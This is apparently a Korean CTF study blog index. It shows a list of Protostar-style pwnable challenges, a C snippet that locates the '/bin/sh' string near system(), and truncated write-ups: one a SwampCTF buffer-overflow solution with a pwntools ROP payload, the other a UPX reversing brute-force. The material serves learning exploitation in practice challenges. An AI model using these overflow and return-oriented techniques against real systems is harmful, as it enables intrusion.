CLEAR LIST Stack0Stack1Stack2Stack3Stack4Stack5Heap0Heap1Stack6Stack7 NOT CLEAR LIST Format0Format1Format2Format3Format4Heap3Heap4Net0Net1Net2Final0Final1Final2 다 풀어 보자 포너블 진짜 미쳐보자.

#include int main(){int shell = 0x주소; // system주소 while(memcmp((void*)shell, "/bin/sh",8))shell++;printf("%x\n",shell);return 0;}

보호되어 있는 글입니다.

5월달 목표 : 한 CTF에서 포너블 2문제 풀기 목표를 이루지 못하면, 공부를 더 해야하는 것. 반성하라.

소요 시간 : 5시간 문제 의도1 read함수를 통해 50바이트를 읽어온다.2 retaddr이 &locret_8048595보다 크면 종료 3. 숨겨진 주소 : 0x08048AEA ropgadget 중 ret를 이용해야 함. payload : 버퍼를 0x26 채운 뒤 + ret 가젯 주소 + 내가 가고싶은 주소(플래그 있는 주소) 코드from pwn import * context.log_level ='debug' p = remote('chal1.swampctf.com',1802)#p = process("./return")print p.recvuntil("do: ")payload =""dummy = "A"*(0x26 + 4)_ret = p32(0x8048372)shell = p32(0x8048615)payl..

문제 의도 UPX Unpacking 문제 풀이 1. 17자리문자열을 입력2. moduls = 14231234143212433LL (signed __int64)가 주어짐 3. 17번 반복한다.-> 조건 1. v3값은 moduls%10값이 되기 때문에 결과적으로 v3는 계속 변한다.-> 변하는 값에 flag[i]를 뺀다-> 그 결과 theresanotherstep이 되면 된다. 코드#include #include #include unsigned char make_brute[] = { "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrsuvwxyzt" };unsigned char over[] = { "theresanotherstep" };int main(){unsigned cha..